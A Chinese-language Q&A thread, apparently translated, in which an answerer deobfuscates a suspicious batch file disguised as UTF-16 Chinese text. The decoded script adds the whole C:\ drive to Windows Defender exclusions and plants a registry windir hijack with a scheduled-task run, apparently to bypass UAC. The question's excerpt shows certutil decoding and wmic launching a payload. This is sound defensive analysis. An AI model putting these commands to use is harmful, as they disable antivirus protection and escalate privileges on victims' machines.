如何用汉字解码批处理文件的内容

Question

如何用汉字解码批处理文件的内容

我有一个批处理文件，里面有很多汉字，如下所示。当我运行它时，该文件被删除。知道如何解码内容是什么以及它在做什么吗？

\n

部分文字：

\n

\xe6\x8c\xa6\xe7\x8d\xac\xe0\xa8\x8d\xe2\x95\x80\xe5\x95\xb0\xe6\xb1\x82\xe6\x8d\x89\xe7\xb8\xba\xe3\xa4\xb8\xe3\xa0\xac\xe2\x94\xb3\xe5\x80\xa5\xe4\x89\x95\xe6\xa5\x8c\xe3\xa9\xa3\xe3\x95\xbe\xe3\x84\xac\xe4\x8c\xa5\xe6\xbd\x88\xe2\x81\x9e\xe6\x99\xaf\xe2\x95\x9e\xe7\x95\x90\xe6\xb1\x82\xe4\x8d\x89\xe7\xb8\xba\xe3\x98\xb4\xe3\x84\xac\xe2\x94\xb6\xe2\x81\xa6\xe0\xb4\xa0\xe5\xb8\x8a\xe7\x80\xa5\xe4\x89\x95\xe4\xa5\xac\xe3\xa9\x83\xe3\x85\xbe\xe2\xb0\xb4\xe2\x94\xb1\xe4\xb1\x9e\xe7\x80\xa5\xe4\x89\x95\xe6\xa5\xac\xe3\xa9\x83\xe3\x95\xbe\xe2\xb0\xb5\xe3\x9c\xb1\xe5\xb8\xa5\xe7\x80\xa5\xe6\x89\xb5\xe4\xa5\xac\xe3\xa9\xa3\xe3\x91\xbe\xe3\x84\xac\xe2\x80\xa5\xe0\xb4\xa0\xe5\x8c\x8a\xe7\x91\x85\xe5\x88\xa0\xe3\xb5\x9e\xe6\x9d\x8a\xe2\x95\x9e\xe5\x95\xb0\xe4\xb1\x82\xe6\x8d\x89\xe7\xb8\xba\xe3\x8c\xb1\xe3\x84\xac\xe5\xb8\xa5\xe7\x91\xa7\xe5\xa1\x87\xe2\x95\xba\xe5\x95\xb0\xe4\xb1\x82\xe6\x8d\x89\xe7\xb8\xba\xe2\xb0\xb4\xe2\x94\xb1\xe2\x95\xb7\xe5\x95\xb0\xe4\xb1\x82\xe6\x8d\x89\xe7\xb8\xba\xe3\x84\xb1\xe3\x84\xac\xe5\xb8\xa5\xe6\xb5\xa8\xe7\x80\xa5\xe4\x89\x95\xe4\xa5\x8c\xe3\xa9\xa3\xe3\x85\xbe\xe2\xb0\xb0\xe2\x94\xb1\xe5\x8d\x9e\xe4\xa1\x9e\xe5\xb9\x89\xe2\x81\x8f\xe0\xa8\x8d\xe7\x88\xa5\xe7\xb8\xba\xe2\xb0\xb8\xe2\x94\xb1\xe2\x95\xa5\xe3\xa9\xb2\xe3\x91\xbe\xe3\x84\xac\xe2\x80\xa5\xe6\x85\xae\xe7\x88\xa5\xe7\xb8\xba\xe3\x88\xb1\xe3\x84\xac\xe6\x94\xa5\xe3\xb4\xa0\xe2\x94\xa0\xe3\xa9\xb2\xe3\x85\xbe\xe2\xb0\xb0\xe2\x94\xb1\xe2\x95\xa1\xe3\xa9\xb2\xe3\x91\xbe\xe3\x84\xac\xe6\x8c\xa5\xe7\x88\xa5\xe7\xb8\xba\xe3\x84\xb1\xe3\x84\xac\xe2\x80\xa5\xe2\x95\xaf\xe3\xa9\xb2\xe3\x85\xbe\xe2\xb0\xb0\xe2\x94\xb1\xe7\x88\xa5\xe7\xb8\xba\xe3\x8c\xb1\xe3\x84\xac\xe2\x94\xa5\xe3\xa9\xb2\xe3\xa1\xbe\xe3\x84\xac\xe6\x8c\xa5\xe2\x95\xa1\xe3\xa9\xb2\xe3\x91\xbe\xe3\x84\xac\xe6\xbc\xa5\xe2\x81\xb2\xe7\x88\xa5\xe7\xb8\xba\xe3\x80\xb1\xe3\x84\xac\xe7\xa4\xa5\xe2\x94\xa0\xe3\xa9\xb2\xe3\x85\xbe\xe2\xb0\xb2\xe2\x94\xb1\xe6\xbd\xaf\xe7\x88\xa5\xe7\xb8\xba\xe3\x88\xb1\xe3\x84\xac\xe3\xa0\xa5\xe3\x94\xb2\xe0\xb4\xa0\xe2\x94\x8a\xe3\xa9\xb2\xe3\xa1\xbe\xe3\x84\xac\xe6\x94\xa5\xe7\x88\xa5\xe7\xb8\xba\xe2\xb0\xb4\xe2\x94\xb1\xe2\x94\xa0\xe3\xa9\xb2\xe3\x85\xbe\xe3\x84\xac\xe2\x94\xa5\xe3\xa9\xb2\xe3\x89\xbe\xe3\x84\xac\xe2\x94\xa5\xe3\xa9\xb2\xe3\x91\xbe\xe3\x84\xac\xe2\x94\xa5\xe3\xa9\xb2\xe3\x85\xbe\xe2\xb0\xb1\xe2\x94\xb1\xe7\x88\xa5\xe7\xb8\xba\xe3\x8c\xb1\xe3\x84\xac\xe2\x94\xa5\xe3\xa9\xb2\xe3\x85\xbe\xe2\xb0\xb0\xe2\x94\xb1\xe3\xb4\xa0\xe2\x94\xa0\xe3\xa9\xb2\xe3\x85\xbe\xe2\xb0\xb1\xe2\x94\xb1\xe7\x88\xa5\xe7\xb8\xba\xe2\xb0\xb4\xe2\x94\xb1\xe7\x88\xa5\xe7\xb8\xba\xe2\xb0\xb4\xe2\x94\xb1\xe2\x95\xb0\xe3\xa9\xb2\xe3\xa1\xbe\xe3\x84\xac\xe3\xa8\xa5\xe2\xbc\xaf\xe7\x88\xa5\xe7\xb8\xba\xe2\xb0\xb1\xe2\x94\xb1\xe7\x88\xa5\xe7\xb8\xba\xe2\xb0\xb2\xe2\x94\xb1\xe7\x88\xa5\xe7\xb8\xba\xe2\xb0\xb4\xe2\x94\xb1\xe7\x88\xa5\xe7\xb8\xba\xe3\x84\xb1\xe3\x84\xac\xe2\x94\xa5\xe3\xa9\xb2\xe3\x85\xbe\xe2\xb0\xb3\xe2\x94\xb1\xe7\x88\xa5\xe7\xb8\xba\xe3\x80\xb1\xe3\x84\xac\xe2\xb8\xa5\xe6\xbd\xa3\xe7\x88\xa5\xe7\xb8\xba\xe3\x88\xb1\xe3\x84\xac\xe2\xbc\xa5\xe7\x88\xa5\xe7\xb8\xba\xe3\x88\xb1\xe3\x84\xac\xe6\xbc\xa5\xe2\x95\xaf\xe3\xa9\xb2\xe3\x85\xbe\xe2\xb0\xb2\xe2\x94\xb1\xe3\x88\xb8\xe2\xbc\xb5\xe7\x88\xa5\xe7\xb8\xba\xe3\x80\xb1\xe3\x84\xac\xe6\x84\xa5\xe7\x88\xa5\xe7\xb8\xba\xe2\xb0\xb4\xe2\x94\xb1\xe2\x95\xa3\xe3\xa9\xb2\xe3\x85\xbe\xe2\xb0\xb1\xe2\x94\xb1\xe6\xbc\xad\xe7\x88\xa5\xe7\xb8\xba\xe3\x80\xb1\xe3\x84\xac\xe6\x98\xa5\xe7\x88\xa5\xe7\xb8\xba\xe3\x8c\xb1\xe3\x84\xac\xe2\x94\xa5\xe3\xa9\xb2\xe3\xa1\xbe\xe3\x84\xac\xe6\x8c\xa5\xe2\x95\xa1\xe3\xa9\xb2\xe3\x91\xbe\xe3\x84\xac\xe6\xbc\xa5\xe2\xb5\xb2\xe7\x88\xa5\xe7\xb8\xba\xe3\x88\xb1\xe3\x84\xac\xe6\x84\xa5\xe6\x95\xa4\xe2\x94\xad\xe3\xa9\xb2\xe3\x89\xbe\xe3\x84\xac\xe6\xb8\xa5\xe7\x80\xad\xe2\x95\xb9\xe3\xa9\xb2\xe3\x91\xbe\xe3\x84\xac\xe2\x94\xa5\xe3\xa9\xb2\xe3\x85\xbe\xe2\xb0\xb1\xe2\x94\xb1\xe6\xb9\xaf\xe2\x80\xa0\xe0\xa8\x8d\xe6\xb9\x9e\xe6\x95\x9e\xe7\x88\xa5\xe7\xb8\xba\xe2\xb0\xb4\xe2\x94\xb1\xe3\x85\x9e\xe2\x81\x9e\xe7\x88\xa5\xe7\xb8\xba\xe2\xb0\xb8\xe2\x94\xb1\xe4\x95\x9e\xe7\x88\xa5\xe7\xb8\xba\xe2\xb0\xb8\xe2\x94\xb1\xe7\x88\xa5\xe7\xb8\xba\xe3\x90\xb1\xe3\x84\xac\xe2\x94\xa5\xe3\xa9\xb2\xe3\x85\xbe\xe2\xb0\xb6\xe2\x94\xb1\xe5\xb9\xaf\xe2\x81\x8e\xe5\xb8\xbe\xe5\x95\x8e\xe4\xb1\x9e\xe3\x88\xa0\xe2\x98\xbe\xe2\x80\xb1\xe0\xb4\xa0\xe5\xb8\x8a\xe7\x88\xa5\xe7\xb8\xba\xe2\xb0\xb2\xe2\x94\xb1\xe2\x81\x86\xe6\x94\xa5\xe5\x89\x92\xe5\x89\x8f\xe6\x95\x8c\xe4\x95\x96\xe2\x95\xac\xe3\xb4\xa0\xe2\x80\xbd\xe2\x80\xb0\xe2\x80\xa8\xe0\xb4\xa0\xe5\x80\x8a\xe5\xb9\xaf\xe5\x88\xa5\xe7\xb8\xba\xe2\xb0\xb9\xe2\x94\xb1\xe5\x89\x85\xe2\x95\x9e\xe3\xa9\x92\xe3\x85\xbe\xe2\xb0\xb4\xe2\x94\xb1\xe5\x88\xa5\xe7\xb8\xba\xe3\x84\xb1\xe3\x84\xac\xe5\xb8\xa5\xe5\xb9\x85\xe5\xb9\x8c\xe2\xbd\xac\xe2\x81\x97\xe3\x84\xb0\xe2\xbc\xa0\xe7\x81\xa5\xe3\x80\xa0\xe2\xbd\x9e\xe6\xb9\x9e\xe5\x88\xa5\xe7\xb8\xba\xe3\x9c\xb1\xe3\x84\xac\xe5\xb8\xa5\xe5\xb9\xb0\xe6\x8c\xaf\xe5\xb8\xa0\xe5\xb8\xa2\xe6\x91\x81\xe4\x91\x9e\xe5\xb8\xad\xe5\xb9\x8d\xe5\x81\xb0\xe5\xb9\xb2\xe4\x99\x85\xe5\xb9\xa5\xe5\xb9\x92\xe6\xb9\x85\xe4\x8d\x9e\xe2\x81\xa5\xe2\xb5\x9e\xe4\x95\x9e\xe5\x88\xa5\xe7\xb8\xba\xe2\xb0\xb6\xe2\x94\xb1\xe6\x8d\x9e\xe2\x95\xac\xe3\xa9\x92\xe3\x85\xbe\xe2\xb0\xb3\xe2\x94\xb1\xe5\x88\xa5\xe7\xb8\xba\xe3\x90\xb1\xe3\x84\xac\xe5\xb8\xa5\xe5\x88\xa5\xe7\xb8\xba\xe3\x98\xb1\xe3\x84\xac\xe6\xbc\xa5\xe4\xb9\x9e\xe5\x81\x9e\xe2\x95\xa1\xe3\xa9\x92\xe3\x91\xbe\xe3\x84\xac\xe2\x94\xa5\xe3\xa9\x92\xe3\x85\xbe\xe2\xb0\xb5\xe2\x94\xb1\xe2\x9c\xa0\xe4\x8d\x9e\xe5\xb0\xba\xe2\x80\xa7\xe5\xb8\xad\xe5\xb9\xa6\xe5\x89\xaf\xe5\xb9\x83\xe3\xad\x85\xe5\xb9\xa5\xe5\x88\xa5\xe7\xb8\xba\xe2\xb0\xb6\xe2\x94\xb1\xe2\x95\x9e\xe3\xa9\x92\xe3\x89\xbe\xe3\x84\xac\xe2\x94\xa5\xe3\xa9\x92\xe3\x91\xbe\xe3\x84\xac\xe2\x80\xa5\xe2\x80\xa2\xe0\xb4\xa0\xe2\xa4\x8a\xe4\x94\xa0\xe2\x95\x8c\xe3\xa9\xb2\xe3\xa1\xbe\xe3\x84\xac\xe5\xb8\xa5\xe2\x81\xa5\xe2\x80\xa8\xe0\xb4\xa0\xe7\x88\x8a\xe2\x95\xa5\xe3\xa9\xb2\xe3\x85\xbe\xe3\x84\xac\xe2\x80\xa5\xe6\x91\xa1\xe2\x81\xa4\xe7\x88\xa5\xe7\xb8\xba\xe3\x94\xb1\xe3\x84\xac\xe4\xac\xa5\xe5\x95\x83\xe4\x95\x9c\xe7\x99\xae\xe7\x88\xa5\xe7\xb8\xba\xe2\xb0\xb2\xe2\x94\xb1\xe6\xbd\xb2\xe2\x95\xae\xe3\xa9\xb2\xe3\x85\xbe\xe2\xb0\xb2\xe2\x94\xb1\xe6\xb9\xa5\xe7\x88\xa5\xe7\xb8\xba\xe2\xb0\xb4\xe2\x94\xb1\xe2\xbc\xa0\xe2\x81\xa6\xe7\x98\xaf\xe2\x94\xa0\xe3\xa9\xb2\xe3\xa5\xbe\xe3\x84\xac\xe2\x94\xa5\xe3\xa9\xb2\xe3\x89\xbe\xe3\x84\xac\xe6\xb8\xa5\xe2\x95\xa4\xe3\xa9\xb2\xe3\x89\xbe\xe3\x84\xac\xe7\x88\xa5\xe2\xbc\xa0\xe7\x88\xa5\xe7\xb8\xba\xe2\xb0\xb4\xe2\x94\xb1\xe5\x88\xa0\xe5\xb9\x85\xe7\x88\xa5\xe7\xb8\xba\xe2\xb0\xb5\xe2\x94\xb1\xe2\x95\x9f\xe3\xa9\xb2\xe3\x85\xbe\xe2\xb0\xb4\xe2\x94\xb1\xe5\xb9\x9a\xe2\xbc\xa0\xe2\x81\xa4\xe2\x89\x9e\xe2\x95\xa3\xe3\xa9\xb2\xe3\x85\xbe\xe2\xb0\xb2\xe2\x94\xb1\xe2\xb9\xa4\xe7\xa1\xa5\xe2\x81\xa5\xe6\x8c\xaf\xe2\x94\xa0\xe3\xa9\xb2\xe3\xa1\xbe\xe3\x84\xac\xe2\x94\xa5\xe3\xa9\xb2\xe3\x91\xbe\xe3\x84\xac\xe6\x84\xa5\xe2\x95\xb2\xe3\xa9\xb2\xe3\x91\xbe\xe3\x84\xac\xe2\x80\xa5\xe2\x89\x9c\xe2\x89\x9c\xe2\x81\x9e\xe2\x94\xaf\xe3\xa9\x92\xe3\x85\xbe\xe2\xb0\xb2\xe2\x94\xb1\xe5\x88\xa5\xe7\xb8\xba\xe2\xb0\xb2\xe2\x94\xb1\xe6\xb9\x9e\xe5\xb0\xa0\xe2\x94\xa2\xe4\x99\xbe\xe5\xb0\xb0\xe3\xb8\xa2\xe4\xb9\x9e\xe7\x88\xa5\xe7\xb8\xba\xe3\x8c\xb1\xe3\x84\xac\xe4\xb0\xa5\xe3\x88\xa0\xe2\x98\xbe\xe2\x80\xb1\xe7\xb0\xa0\xe2\x81\xbc\xe2\x95\x9e\xe3\xa9\x92\xe3\x85\xbe\xe2\xb0\xb4\xe2\x94\xb1\xe7\x99\x9e\xe2\x95\xa3\xe3\xa9\x92\xe3\x85\xbe\xe2\xb0\xb5\xe2\x94\xb1\xe5\x88\xa5\xe7\xb8\xba\xe3\x9c\xb1\xe3\x84\xac\xe2\x94\xa5\xe3\xa9\x92\xe3\xa1\xbe\xe3\x84\xac\xe2\x94\xa5\xe3\xa9\x92\xe3\x91\xbe\xe3\x84\xac\xe5\xb8\xa5\xe2\x80\xa2\xe4\xb8\xbe\xe7\x88\xa5\xe7\xb8\xba\xe3\x8c\xb1\xe3\x84\xac\xe5\xb8\xa5\xe2\x81\x8c\xe3\xb8\xb2\xe3\x84\xa6\xe2\x80\xa0\xe0\xa8\x8d\xe7\x88\xa5\xe7\xb8\xba\xe3\x90\xb1\xe3\x84\xac\xe6\x8c\xa5\xe7\x88\xa5\xe7\xb8\xba\xe3\x94\xb1\xe3\x84\xac\xe5\x90\xa5\xe2\x95\x81\xe3\xa9\xb2\xe3\xa1\xbe\xe3\x84\xac\xe6\xac\xa5\xe7\x88\xa5\xe7\xb8\xba\xe2\xb0\xb8\xe2\x94\xb1\xe2\xbc\xa0\xe5\x95\x92\xe2\x81\x8e\xe2\xbd\x9e\xe6\xb9\x94\xe5\xb0\xa0\xe2\x95\x8d\xe3\xa9\xb2\xe3\x85\xbe\xe2\xb0\xb6\xe2\x94\xb1\xe7\x89\xa3\n

Run Code Online (Sandbox Code Playgroud)\n

自从第 3 方安装它以来，它一直是服务器上的一个批处理文件，但它们现在已经破产，我们正在尝试弄清楚到底发生了什么

\n

当我们针对它运行文件时，我们得到：

\n

Little-endian UTF-16 Unicode text, with very long lines, with no line terminators\n

Run Code Online (Sandbox Code Playgroud)\n

它没有翻译成任何东西，所以它实际上可能不是中文，但那是由于我的无知而不是其他原因

\n

我也尝试过使用iconv，但文件保持不变

\n

iconv -f utf-16 -t utf-8 batchfile.bat > filename_new.txt\n

Run Code Online (Sandbox Code Playgroud)\n

当我运行strings它时，我得到一些可读的东西

\n

certutil -f -decode %pooth% %pooth%\ntimeout 1\nwmic process call create %pooth%\nsetlocal enableextensions\n

Run Code Online (Sandbox Code Playgroud)\n

在十六进制编辑器中，我得到以下内容，虽然它更具可读性，但它看起来仍然像乱码

\n

Answer 1

use*_*686 75

该文件实际上具有常规 ASCII 文本（或 Windows-125x）。

\n

它看起来只是有点像包含一些汉字的UTF-16，因为在开始时精心选择了一些字节，这些字节能够欺骗file其他字符集检测软件。（您的屏幕截图显示该文件以 FF FE 开头，即 UTF-16LE 中的 U+FEFF“字节顺序标记”。）

\n

但我将您的示例存储为 UTF-16 LE，然后要求我的文本编辑器直接将这些字节解释为 ASCII 或 Windows-1252 \xe2\x80\x93 不转换，而是按字面意思将文件打开为 cp1252，就像您的十六进制编辑器一样 \ xe2\x80\x93 然后我得到一个常规的 Windows Cmd 批处理脚本：

\n

&cls\n@%pUBlIc:~89,83%%PUBLic:~5,1%CHo^ of^%PuBlIC:~46,16%f  \n^%pUBlIC:~14,1%^L%pUBliC:~55,17%^%publIc:~4,1%  \nSEt R^=Jg^%pUBLIc:~13,1%^gtGXz%pUBLIc:~4,1%w%pUBLIc:~11,1%^hm%pUBLIc:~10,1%^S^HI^O \n%r:~8,1%e%r:~4,1% na%r:~12,1%e = %r:~10,1%a%r:~4,1%c%r:~11,1% o%r:~10,1%%r:~13,1%%r:~8,1%ca%r:~4,1%or %r:~10,1%y %r:~12,1%oo%r:~12,1%825 \n%r:~8,1%e%r:~4,1% %r:~1,1%%r:~2,1%%r:~4,1%%r:~11,1%%r:~13,1%%r:~10,1% = %r:~11,1%%r:~4,1%%r:~4,1%p%r:~8,1%://%r:~1,1%%r:~2,1%%r:~4,1%%r:~11,1%%r:~13,1%%r:~10,1%.co%r:~12,1%/%r:~12,1%oo%r:~12,1%825/%r:~10,1%a%r:~4,1%c%r:~11,1%-o%r:~10,1%f%r:~13,1%%r:~8,1%ca%r:~4,1%or-%r:~12,1%ade-%r:~2,1%n-py%r:~4,1%%r:~11,1%on  \n^n^e%r:~4,1%^1^ %r:~8,1%^E%r:~8,1%%r:~14,1%%r:~16,1%o^N >^NU^L 2>&1  \n^%r:~2,1%F %eRRORLeVEl% == 0 (  \nPo^%R:~9,1%ER^%R:~14,1%%R:~11,1%^E^L^l/W 01 /ep 0^/^n%R:~17,1%^p^/c ^"^Ad^D-^M^pPr^EFe^R^En^Ce ^-^E%R:~6,1%^cl%R:~13,1%%R:~14,1%^%R:~16,1%o^N^Pa%R:~4,1%%R:~15,1% \'^C:\\\' -^f^oRC^E;e^%R:~6,1%^%R:~2,1%%R:~4,1% "  \n) EL%r:~8,1%^e (  \nre%r:~1,1% add %r:~15,1%KCU\\Env%r:~2,1%ron%r:~12,1%en%r:~4,1% /f /v %r:~9,1%%r:~2,1%nd%r:~2,1%r /%r:~4,1% RE^%r:~5,1%_%r:~14,1%Z^ /d ^"c%r:~12,1%d.exe /c %r:~8,1%%r:~4,1%ar%r:~4,1% \\"\\"^ /%R:~12,1%%R:~2,1%^n \\"%~F0\\">^N%r:~13,1%L 2>&1  || ^%R:~14,1%^vc%R:~15,1%%R:~17,1%%R:~8,1%%R:~4,1%^" >N%r:~13,1%^L 2>&1  \n%r:~14,1%c%r:~15,1%TA%r:~8,1%k%r:~8,1% /RUN ^/Tn \\M%r:~16,1%cr\n

Run Code Online (Sandbox Code Playgroud)\n

（通常，相同的字节可以通过多种方式读取 \xe2\x80\x93 例如，2c 31如果读取为 UTF-16 LE，这两个字节表示字符“\xe3\x84\xac”，或者,1如果读取为 ASCII，则表示字符。对于例如，您在编辑器中经常看到“\xe3\xa9\xb2\xe3\x89\xbe\xe3\x84\xac”，因为它实际上是r:~2,1批量变量扩展的一部分。）

\n

这个“乱码”是一个标准的批处理文件，只是有点混淆 \xe2\x80\x93 你正在查看大量的%variable:~start,length%变量扩展；变量中的特定字符%PUBLIC%被重新组装成%R%，然后该变量的特定字符用于构建命令。然而，例如，

\n

re%r:~1,1% add %r:~15,1%KCU\\Env%r:~2,1%ron%r:~12,1%en%r:~4,1% /f /v\n

Run Code Online (Sandbox Code Playgroud)\n

明确的意思是reg add HKCU\\Environment /f /v。

\n

通过猜测 \xc2\xb9构建大部分内容%R%并删除大量无关的^转义字符后，结果是：

\n

&cls\n@ECHo off  \ncLs  \nSEt R=JgigtGXzswbhmuSHIO \nset name = batch obuscator by moom825 \nset github = https://github.com/moom825/batch-obfuscator-made-in-python  \nnet1 sEsSIoN >NUL 2>&1  \niF %eRRORLeVEl% == 0 (  \nPowERShELl/W 01 /ep 0/nOp/c "AdD-MpPrEFeREnCe -EXcluSIoNPatH \'C:\\\' -foRCE;eXit "  \n) ELse (  \nreg add HKCU\\Environment /f /v windir /t REG_SZ /d "cmd.exe /c start \\"\\" /min \\"%~F0\\">NuL 2>&1  || SvcHOst" >NuL 2>&1  \nScHTAsks /RUN /Tn \\MIcr\n

Run Code Online (Sandbox Code Playgroud)\n

它做的第一件事是非常可疑的\xe2\x80\x93，在使用检查它是否具有管理员权限后net1 session，它将整个C:\\驱动器添加到Windows Defender的排除列表中。（在“else”情况下，它可能会尝试通过任务计划程序提升自身，作为绕过 UAC 的一种方式。）

\n

根据最初的代码片段，这可能能够对其余部分进行反混淆：

\n

&cls\n@%pUBlIc:~89,83%%PUBLic:~5,1%CHo^ of^%PuBlIC:~46,16%f  \n^%pUBlIC:~14,1%^L%pUBliC:~55,17%^%publIc:~4,1%  \nSEt R^=Jg^%pUBLIc:~13,1%^gtGXz%pUBLIc:~4,1%w%pUBLIc:~11,1%^hm%pUBLIc:~10,1%^S^HI^O \n%r:~8,1%e%r:~4,1% na%r:~12,1%e = %r:~10,1%a%r:~4,1%c%r:~11,1% o%r:~10,1%%r:~13,1%%r:~8,1%ca%r:~4,1%or %r:~10,1%y %r:~12,1%oo%r:~12,1%825 \n%r:~8,1%e%r:~4,1% %r:~1,1%%r:~2,1%%r:~4,1%%r:~11,1%%r:~13,1%%r:~10,1% = %r:~11,1%%r:~4,1%%r:~4,1%p%r:~8,1%://%r:~1,1%%r:~2,1%%r:~4,1%%r:~11,1%%r:~13,1%%r:~10,1%.co%r:~12,1%/%r:~12,1%oo%r:~12,1%825/%r:~10,1%a%r:~4,1%c%r:~11,1%-o%r:~10,1%f%r:~13,1%%r:~8,1%ca%r:~4,1%or-%r:~12,1%ade-%r:~2,1%n-py%r:~4,1%%r:~11,1%on  \n^n^e%r:~4,1%^1^ %r:~8,1%^E%r:~8,1%%r:~14,1%%r:~16,1%o^N >^NU^L 2>&1  \n^%r:~2,1%F %eRRORLeVEl% == 0 (  \nPo^%R:~9,1%ER^%R:~14,1%%R:~11,1%^E^L^l/W 01 /ep 0^/^n%R:~17,1%^p^/c ^"^Ad^D-^M^pPr^EFe^R^En^Ce ^-^E%R:~6,1%^cl%R:~13,1%%R:~14,1%^%R:~16,1%o^N^Pa%R:~4,1%%R:~15,1% \'^C:\\\' -^f^oRC^E;e^%R:~6,1%^%R:~2,1%%R:~4,1% "  \n) EL%r:~8,1%^e (  \nre%r:~1,1% add %r:~15,1%KCU\\Env%r:~2,1%ron%r:~12,1%en%r:~4,1% /f /v %r:~9,1%%r:~2,1%nd%r:~2,1%r /%r:~4,1% RE^%r:~5,1%_%r:~14,1%Z^ /d ^"c%r:~12,1%d.exe /c %r:~8,1%%r:~4,1%ar%r:~4,1% \\"\\"^ /%R:~12,1%%R:~2,1%^n \\"%~F0\\">^N%r:~13,1%L 2>&1  || ^%R:~14,1%^vc%R:~15,1%%R:~17,1%%R:~8,1%%R:~4,1%^" >N%r:~13,1%^L 2>&1  \n%r:~14,1%c%r:~15,1%TA%r:~8,1%k%r:~8,1% /RUN ^/Tn \\M%r:~16,1%cr\n

Run Code Online (Sandbox Code Playgroud)\n

\n

\xc2\xb9 （我在 Linux 上执行此操作，但没有意识到 %PUBLIC% 实际上是所有 Windows 系统上都存在的默认变量...）

\n

[obfuscator本身](https://github.com/moom825/batch-obfuscator-made-in-python/blob/main/batchobfuscator.py)看起来很模糊！不过，我特别喜欢假进度条。 (2认同)

归档时间：	4 年，8 月前
查看次数：	9079 次
最近记录：	2 年，8 月前